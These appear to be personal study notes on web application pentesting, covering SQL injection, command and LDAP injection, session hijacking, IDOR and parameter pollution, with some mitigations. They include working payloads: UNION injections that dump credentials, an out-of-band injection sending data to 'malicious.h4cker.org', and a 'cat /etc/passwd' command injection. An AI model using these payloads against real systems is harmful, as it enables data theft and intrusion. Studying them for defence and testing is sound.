HTTP

several granular examples of business logic flaws including the following:

Unverified ownership
Authentication bypass using an alternate path or channel
Authorization bypass through user-controlled key
Weak password recovery mechanism for forgotten password
Incorrect ownership assignment
Allocation of resources without limits or throttling
Premature release of resource during expected lifetime
Improper enforcement of a single, unique action
Improper enforcement of a behavioral workflow

most common SQL statements (commands):

SELECT: Used to obtain data from a database
UPDATE: Used to update data in a database
DELETE: Used to delete data from a database
INSERT INTO: Used to insert new data into a database
CREATE DATABASE: Used to create a new database
ALTER DATABASE: Used to modify a database
CREATE TABLE: Used to create a new table
ALTER TABLE: Used to modify a table
DROP TABLE: Used to delete a table
CREATE INDEX: Used to create an index or a search key element
DROP INDEX: Used to delete an index

SQL statements are divided into the following categories:

Data definition language (DDL) statements
Data manipulation language (DML) statements
Transaction control statements
Session control statements
System control statements
Embedded SQL statements

boolean sql:
something' OR '1'='1#

figuring out how many columns are there:
1' ORDER BY 3 # changing the 3 value...if it runs on an error, the last working number is the solution.

Checking the database management system version number:
1' OR 1=1 UNION SELECT 1, VERSION()#

Determine the database name:
1' OR 1=1 UNION SELECT 1, DATABASE()#

Retrieve table names from the database:
1' OR 1=1 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_type='base table' AND table_schema='dvwa'#
where dvwa is the name of the database...

Retrieve column names from the users table:
1' OR 1=1 UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users'#
users is the tablename

Retrieve the user credentials:
1' OR 1=1 UNION SELECT user, password FROM users #



SQL injection attacks can be divided into the following categories:

  -  In-band SQL injection: With this type of injection, the attacker obtains the data by using the same channel that is used to inject the SQL code. 
     This is the most basic form of an SQL injection attack, where the data is dumped directly in a web application (or web page).

  -  Out-of-band SQL injection: With this type of injection, the attacker retrieves data using a different channel. For example, an email, a text, 
     or an instant message could be sent to the attacker with the results of the query; or the attacker might be able to send the compromised data to another system.
  -  Blind (or inferential) SQL injection: With this type of injection, the attacker does not make the application display or transfer any data; rather, the attacker 
     is able to reconstruct the information by sending specific statements and discerning the behavior of the application and database.


Five techniques that can be used to exploit SQL injection vulnerabilities:

  -  Union operator: This is typically used when an SQL injection vulnerability allows a SELECT statement to combine two queries into a single result or a set of results.
  -  Boolean: This is used to verify whether certain conditions are true or false.
  -  Error-based technique: This is used to force the database to generate an error in order to enhance and refine an attack (injection).
  -  Out-of-band technique: This is typically used to obtain records from the database by using a different channel. For example, it is possible to make an HTTP connection to send the results to a different web server or a local machine running a web service.
  -  Time delay: It is possible to use database commands to delay answers. An attacker may use this technique when he or she doesn’t get output or error messages from the application.

Figuring out the type of the SQL database:
Checking error messages:

MYSQL:
  MySQL Error 1064: You have an error in your SQL syntax
Microsoft SQL:
  Microsoft SQL Native Client error %u201880040e14%u2019
  Unclosed quotation mark after the character string
Microsoft SQL with ASP (active server page):
  Server Error in '/' Application
Oracle:
  ORA-00933: SQL command not properly ended
PostgreSQL:
  PSQLException: ERROR: unterminated quoted string at or near " ' " Position: 1
  or
  Query failed: ERROR: syntax error at or near
  " ' " at character 52 in /www/html/buyme.php on line 69.

MySQL: 'finger' + 'printing'
SQL Server: 'finger' 'printing'
Oracle: 'finger'||'printing'
PostgreSQL: 'finger'||'printing'

UNION Exploitation technique: 
https://store.h4cker.org/buyme.php?id=1234' UNION SELECT 1, user_name,password,'1','1','1',1 FROM user_system_data --

Out-of-band exploitation:
When the attacker forces the database management system (DBMS) to send the results to another server. It's actually a blind sql attack, you cant see directly the results, you can only forces it so send the result
An example:
https://store.h4cker.org/buyme.php?id=8||UTL_HTTP.request('malicious.h4cker.org')||(SELECT user FROM DUAL)--

Time-delay sql:
https://store.h4cker.org/buyme.php?id=8 AND IF(version() like '8%', sleep(10), 'false'))--

Stored procedure


command injection:
something;cat /etc/passwd

Lightweight Directory Access Protocol (LDAP) Injection Vulnerabilities:

There are two general types of LDAP injection attacks:

Authentication bypass: The most basic LDAP injection attacks are launched to bypass password and credential checking.
Information disclosure: An attacker could inject crafted LDAP packets to list all resources in an organization’s directory and perform reconnaissance.

Mitigate sql injection:
  -  using parameterized queries (prepared statements)
  -  input checking
  -  field validation
  -  filtering user inputs
  -  escaping user input

authentication-based vulnerabilities in an affected system:

Credential brute forcing
Session hijacking
Redirecting
Exploiting default credentials
Exploiting weak credentials
Exploiting Kerberos

Session Hijacking:

web session high-level process:
  -  pre-authentication
  -  authentication
  -  session management
  -  access control
  -  session finalization

SSID variations:
  -  PHP: PHPSESSID
  -  J2EE: JSESSIONID
  -  ColdFusion: CFID and CFTOKEN
  -  ASP.NET: ASP.NET_SessionId

Several ways an attacker can perform session hijacking and several ways a session token may be compromised:

Predicting session tokens: This is why it is important to use non-predictable tokens, as previously discussed in this section.
Session sniffing: This can occur through collecting packets of unencrypted web sessions.
On-path attack (formerly known as man-in-the-middle attack): With this type of attack, the attacker sits in the path between the client and the web server. 
In addition, a browser (or an extension or a plugin) can be compromised and used to intercept and manipulate web sessions between the user and the web server. 
This browser-based attack was previously known as a man-in-the-browser attack.

To protect against session hijacking, you should verify that the developers have:
  -  changed the default session ID name of the web development framework to the generic name
  -  ensured that the session ID is long enough to prevent brute-force attacks; the session ID must be at least 128 bits long.
  -  ensured that the session ID is unique and unpredictable
  -  used a cryptographically secure pseudorandom number generator (PRNG) for the session ID
 
Kerberos Vulnerabilities
  -  golden ticket attack
  -  use of unconstrained Kerberos delegation

Parameter pollution:
HTTP parameter pollution (HPP) vulnerabilities can be introduced if multiple HTTP parameters have the same name. This issue may cause an application to interpret values incorrectly. 
An attacker may take advantage of HPP vulnerabilities to bypass input validation, trigger application errors, or modify internal variable values.
Example:
https://store.h4cker.org/?search=cars&results=20&search=bikes

Insecure Direct Object Reference Vulnerabilities
Insecure Direct Object Reference vulnerabilities can be exploited when web applications allow direct access to objects based on user input. 
Successful exploitation could allow attackers to bypass authorization and access resources that should be protected by the system (for example, database records, system files). 
This type of vulnerability occurs when an application does not sanitize user input and does not perform appropriate authorization checks.
Example:
https://store.h4cker.org/buy?customerID=1188
If we change 1188 maybe we get another customers information.
https://store.h4cker.org/changepassd?user=omar
etc.

authorization-based vulnerabilities:
  -  HTTP parameter pollution
  -  Insecure Direct Object Reference

authentication-based vulnerabilities:
  -  Kerberos weakness
  -  session hijacking
  -  default credentials

